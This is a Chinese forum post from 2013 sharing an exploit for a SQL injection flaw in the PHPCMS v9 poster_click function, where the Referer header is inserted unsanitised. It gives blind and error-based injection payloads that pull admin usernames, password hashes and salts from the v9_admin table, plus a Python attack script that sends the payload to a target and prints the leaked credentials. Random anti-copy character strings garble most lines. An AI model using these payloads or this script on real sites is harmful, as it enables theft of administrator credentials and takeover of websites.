有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
4 o) t: Z1 G0 n: h4 n
/ f6 q7 i; m4 j问题函数\phpcms\modules\poster\index.php4 [# u& I3 D1 n, s( i, n# e
! ]6 g: e ]( R) v; @; Z
public function poster_click() {
0 x) P3 G( p4 ?$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 x* n' @: x# t7 j" W$r = $this->db->get_one(array('id'=>$id));* q6 o' a4 C; X) T& W$ b
if (!is_array($r) && empty($r)) return false;; H( B3 A/ R% W# H- ~; O f- Z
$ip_area = pc_base::load_sys_class('ip_area');) ?1 o( f k1 Z/ Y7 G
$ip = ip();$ Y/ f. K, {( K% ~$ w7 h
$area = $ip_area->get($ip);9 o9 d7 L1 Q2 M* F) h2 R% L& {
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
# B! |0 o p, R$ eif($id) {8 h; M! q2 z: K1 f( {
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
) k. \! m# V% ?& _$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));* a$ e7 n# u* Z2 T2 h
}2 S0 P( o" D3 K1 t5 o, v8 i
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));7 q5 D! X" T1 y* h- B9 B# S: j8 B
$setting = string2array($r['setting']);1 h7 I6 r# i) Y4 G( s: K
if (count($setting)==1) {
R% n+ j+ X- G$url = $setting['1']['linkurl'];( a: K8 I0 o( b2 o
} else {' ^' `/ ^ Z9 s u0 U2 j
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];# N o$ v9 Y5 W1 j
}
4 X3 b" R( {, P6 w. {9 v( B- p: Wheader('Location: '.$url);
5 ` }3 e1 M4 t8 n: w a}
0 w- @; v: n7 u$ s, n# \
- q# a1 W. `) `5 |. V S# l1 N 8 S4 j& i- h* r0 H
' V' h) s7 Y6 l% l# }4 A: D# T
利用方式:
9 w" m" Y8 W; h8 ~6 h8 a$ ~& ^; u U2 u, h) A" q# V& @( }. j, p% d. i
1、可以采用盲注入的手法:; Q+ q! R$ e, w/ V4 C
$ }- ~! R+ E9 H g, X3 V8 g' ureferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
) I C' A. [2 E0 f' T% T" x& ^7 A/ h0 u. U; K6 r: B
通过返回页面,正常与否一个个猜解密码字段。
) F, Z, w* r5 C; L# |) @/ H% j! ^1 v0 h8 B& x$ {% J
2、代码是花开写的,随手附上了:& ^; A5 C4 S& q% @* s% l! ]
- V- r0 n+ w. X5 r
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#( s6 J2 M& F0 M+ q, ]- G
; ?, N' @9 ~ @2 a5 n- z" g5 _
此方法是爆错注入手法,原理自查。 h3 ~3 v6 u+ S% Z* h a
2 M( t6 [) p6 n0 |% g
3 b* K1 u2 M# @9 ~
2 F. M" s, C/ c$ I. l利用程序:6 c8 V8 C2 o# Z+ w
5 U: `* C4 M9 D
#!/usr/bin/env python6 y8 b% r7 j# O8 o5 z
import httplib,sys,re
7 V. q0 ^* G9 B W: E/ ?9 h: L$ A. G. V0 p* s& B
def attack():- A9 D' c }7 B; N7 }' X
print “Code by Pax.Mac Team conqu3r!”
8 Q2 n2 t4 \" I. I: @print “Welcome to our zone!!!”
# B" | h1 G* d0 f0 ~url=sys.argv[1]8 Q& ~% ^" O( R2 N1 q* B
paths=sys.argv[2]
5 h; j. t$ U7 ]" X- Hconn = httplib.HTTPConnection(url)
& q8 L- J9 J" u' Li_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
0 c& f8 b" j+ I; o& r“Accept”: “text/plain”,! e. P/ ?4 I% z' s
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
$ [! \1 t( r0 p$ aconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
. `% v( ?, E! Cr1 = conn.getresponse()
) Y& @2 Y! \" Q) sdatas=r1.read()# \4 b$ _/ J! a e
datas=re.findall(r”Duplicate entry \’\w+’”, datas)6 {, n0 \, w* I! i, q. }' u
print datas[0]
: b' U* C7 F. a& q# D/ N1 O* J# nconn.close()
8 Z, \ f6 J+ ?2 {: H4 B; Aif __name__==”__main__”:' c' N7 [6 m- a8 O, F
if len(sys.argv)<3:: u5 c: s/ B0 T3 o( s# z4 m8 N* I( ~
print “Code by Pax.Mac Team conqu3r”$ V$ P- t2 J' `4 c
print “Usgae:”0 q" x: l: z2 k2 n
print “ phpcmsattack.py www.paxmac.org /”
& a( C: I, r6 [ jprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”9 y2 w% w5 @& k
sys.exit(1)
& @+ d- c; N# Tattack()
. Q X1 P9 P& z; s# j n1 I* s( a4 z0 A
|
发表于 2013-1-11 21:01:00
收藏
支持
反对